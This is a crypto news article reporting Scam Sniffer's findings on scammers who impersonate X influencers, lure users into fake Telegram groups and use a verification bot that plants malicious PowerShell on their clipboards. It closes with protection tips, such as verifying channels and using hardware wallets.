This is How Scammers Are Using Telegram Bots to Target Your Crypto

The crypto industry is growing daily, and so are scammers and bad actors. Recent findings reveal a new evolution in crypto scams and phishing activities, with cyber criminals now combining malware with social engineering attacks.

Web3 anti-scam firm Scam Sniffer revealed in a series of tweets that one of the new sophisticated attacks is targeting crypto users through fake Telegram groups. These scammers are impersonating X crypto influencers and using malicious bots for verification.

Crypto Scammers Target Telegram Users

The attackers first create multiple fake X accounts mimicking crypto influencers. Then, they comment on the posts of legitimate influencers, inviting users to join their exclusive Telegram groups for alpha and investment insights.

Scam Sniffer has noted a surge in X impersonations and a major rise in fake crypto accounts, with daily numbers going above 300. These accounts hovered around 160 in November. In fact, two victims have already lost more than $3 million from clicking the malicious links shared by these fake accounts.

Crypto users who click on the Telegram group invites posted by the fake accounts are prompted to verify through a malicious bot dubbed “ OfficiaISafeguardBot.” The bot aims to hasten the process by providing very short verification windows.

During the verification process, the bot secretly injects malicious PowerShell code into the victim’s clipboard. PowerShell language enables system administrators to automate actions and configurations through a high-level proprietary programming syntax. Hence, when executed, the malicious code can download and run malware that will compromise a victim’s system and crypto wallets.

While Scam Sniffer only identified two users who lost millions by clicking on malicious X links, the firm disclosed that many users have fallen victim to these sophisticated Telegram attacks. There have also been cases where scammers stole users’ private keys via malicious links.

Protection Tips

Although VirusTotal, an online service that analyzes suspicious links to detect malware and malicious content, has flagged the Telegram malware as a scam, Scam Sniffer has offered tips for users to protect themselves.

The protection tips include thoroughly verifying official channels, never executing unknown commands, and refraining from running arbitrary codes. Users should also be wary of time-pressured verification processes and avoid installing unknown software. Additionally, hardware wallets are recommended because they store users’ cryptocurrencies more securely offline.